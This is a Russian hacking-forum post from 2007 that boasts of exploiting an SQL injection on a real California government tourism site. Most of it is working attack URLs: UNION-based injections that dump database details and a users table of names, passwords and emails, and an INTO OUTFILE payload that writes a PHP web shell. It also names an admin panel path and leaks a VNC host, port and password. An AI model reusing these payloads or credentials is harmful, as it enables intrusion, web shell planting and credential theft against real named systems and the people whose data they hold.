04.07.2007, 00:46
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
Сообщение от Isis
Нашел скульку на gocalif.ca.gov с PR - 7..
Думал будут денюшки =)
Не тут то было...
Скульку то я нашел...
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/*
Mysql version - 4.1.20-log
MySQL user - cttc@206.188.24.66
MySQL database - cttc_site
Экранирования кавычек нету:
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'Antichat%20-%20imho%20the%20best%20(c)%20b00zy_c0d3r',5,6/*
Даже права есть...
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'We%20have%20every%20right',5,6+from+mysql.user/*
File-priv тоже есть...проверили на /tmp/
Код:
http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'%3C?php%20system($_GET[cmd]);%20?%3E',5,6+from+mysql.user+into+outfile+'/tmp/antichat.php'/*
Но вот пути для заливки шелла я не нашел =( Вообщем пол дня пытался подобрать имя к хоум дире, получил след результаты.
пути:
/etc/httpd/conf/httpd.conf - апач
/var/www/html - htdocs
таблица:
users
Код:
http://www.visitcalifornia.com/page.php?id=-1+union+select+1,2,3,user_name,password,email,7,8,9,10,11,12,13,14,15+from+users+limit+0,1/*
лимит в помощь
админка(cms):
http://gocalif.ca.gov/site/cms/index.php
vnc client:
host=64.160.126.137
port=5900
password=9555cd837f884713
ЗЫ
Название хоум диры ппц ((
|
|
|